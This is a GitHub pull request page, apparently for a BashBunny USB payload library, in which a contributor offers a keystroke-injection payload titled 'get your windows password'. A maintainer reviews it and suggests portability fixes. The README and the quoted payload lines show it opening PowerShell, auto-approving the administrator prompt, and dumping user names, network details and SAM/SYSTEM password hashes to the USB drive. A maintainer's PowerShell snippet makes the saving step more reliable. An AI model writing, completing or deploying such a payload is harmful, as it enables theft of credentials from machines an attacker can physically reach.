get your windows password #701
Open
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
I created a payload that gets the windows password hash
created a README
Member
|
Placing this PR on hold as I am currently away from my hardware and am unable to test. I will follow up with a review soon :) |
hak5peaks
requested changes
Nov 25, 2025
| Then it says yes to run as admin. | ||
| Then it writes down the users. (just in case you dont know what the username is (Ik its irelevant)) | ||
| Then it writes down the IPs. (so you know what to connect to) | ||
| Then it writes down the hashes with SAM and SYSTEM. |
Member
There was a problem hiding this comment.
This payload seems more fitting inside of the exfiltration category due to its nature. Please move it into that category directory.
| QUACK DELAY 2200 | ||
| QUACK ALT Y | ||
| QUACK DELAY 1000 | ||
| QUACK STRING "ipconfig /all | Out-File -FilePath 'D:\nothingwashereorwillhappen\IP.txt'" |
Member
There was a problem hiding this comment.
Not everyone's BashBunny will mount as D:/ drive. A better approach to this is use the BashBunny drive label.
DRIVE_LABEL="BashBunny"
QUICK STRING '$Drive = (Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq "'$DRIVE_LABEL'" }).DriveLetter + "\"; $Drive'
This will have powershell use the BashBunny Label to locate the drive letter of the bash bunny and export it as a powershell variable you can then later use for saving files to the BashBunny.
Just as a example:
QUACK STRING 'whoami /all | Out-File -FilePath "$($DRIVE)\loot\waitwhoamI.txt"'`
Please make this change across your payload and be mindful for syntax overlaps.
| Then it writes down the users. (just in case you dont know what the username is (Ik its irelevant)) | ||
| Then it writes down the IPs. (so you know what to connect to) | ||
| Then it writes down the hashes with SAM and SYSTEM. | ||
| DISCLAIMER: this is all wroten down on D:\nothingwashereorwillhappen\ so you need to have a folder with that name on your bash bunny. |
Member
There was a problem hiding this comment.
Please add a note instructing the end user to make a directory on the BashBunny root directory named nothingwashereorwillhappen as this is critical to the payload running. I would recommend renaming this directory to just be loot to simplify thing as I did in my code example.
Author
|
Thx I didn’t know to do it at that moment I will look into it at a later date thank you now and thank you in advancedDen 25. nov. 2025 kl. 23.33 skrev Peaks ***@***.***>:
@hak5peaks requested changes on this pull request.
In payloads/library/phishing/getWINDOWSpassword/README.md:
@@ -0,0 +1,18 @@
+AUTHOR: AlexanderWyt
+SIDE NOTE: this is just a prototype and I will make a better one later
+
+HOW IT WORKS:
+It goes into a keyboard and storage.
+Then it turns red.
+Then it opens powershell via the run command.
+Then it closes powershell and makes it run as admin.
+Then it says yes to run as admin.
+Then it writes down the users. (just in case you dont know what the username is (Ik its irelevant))
+Then it writes down the IPs. (so you know what to connect to)
+Then it writes down the hashes with SAM and SYSTEM.
This payload seems more fitting inside of the exfiltration category due to its nature. Please move it into that category directory.
In payloads/library/phishing/getWINDOWSpassword/payload.txt:
@@ -0,0 +1,28 @@
+ATTACKMODE HID STORAGE
+LED R
+QUACK GUI r
+QUACK STRING powershell
+QUACK ENTER
+QUACK DELAY 1000
+QUACK STRING "exit Start-Process powershell -Verb RunAs"
+QUACK ENTER
+QUACK DELAY 2200
+QUACK ALT Y
+QUACK DELAY 1000
+QUACK STRING "ipconfig /all | Out-File -FilePath 'D:\nothingwashereorwillhappen\IP.txt'"
Not everyone's BashBunny will mount as D:/ drive. A better approach to this is use the BashBunny drive label.
DRIVE_LABEL="BashBunny"
QUICK STRING '$Drive = (Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq "'$DRIVE_LABEL'" }).DriveLetter + "\"; $Drive'
This will have powershell use the BashBunny Label to locate the drive letter of the bash bunny and export it as a powershell variable you can then later use for saving files to the BashBunny.
Just as a example:
QUACK STRING 'whoami /all | Out-File -FilePath "$($DRIVE)\loot\waitwhoamI.txt"'`
Please make this change across your payload and be mindful for syntax overlaps.
In payloads/library/phishing/getWINDOWSpassword/README.md:
@@ -0,0 +1,18 @@
+AUTHOR: AlexanderWyt
+SIDE NOTE: this is just a prototype and I will make a better one later
+
+HOW IT WORKS:
+It goes into a keyboard and storage.
+Then it turns red.
+Then it opens powershell via the run command.
+Then it closes powershell and makes it run as admin.
+Then it says yes to run as admin.
+Then it writes down the users. (just in case you dont know what the username is (Ik its irelevant))
+Then it writes down the IPs. (so you know what to connect to)
+Then it writes down the hashes with SAM and SYSTEM.
+DISCLAIMER: this is all wroten down on D:\nothingwashereorwillhappen\ so you need to have a folder with that name on your bash bunny.
Please add a note instructing the end user to make a directory on the BashBunny root directory named nothingwashereorwillhappen as this is critical to the payload running. I would recommend renaming this directory to just be loot to simplify thing as I did in my code example.
—Reply to this email directly, view it on GitHub, or unsubscribe.You are receiving this because you authored the thread.Message ID: ***@***.***>
|
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
3 participants
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Hi I made this so you can get a computers password this only works on Windows.
And I just want to say have a great day.